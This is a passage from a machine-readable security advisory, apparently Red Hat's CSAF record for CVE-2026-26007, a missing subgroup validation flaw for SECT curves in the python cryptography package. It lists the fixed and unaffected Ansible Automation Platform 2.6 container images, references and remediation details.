}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
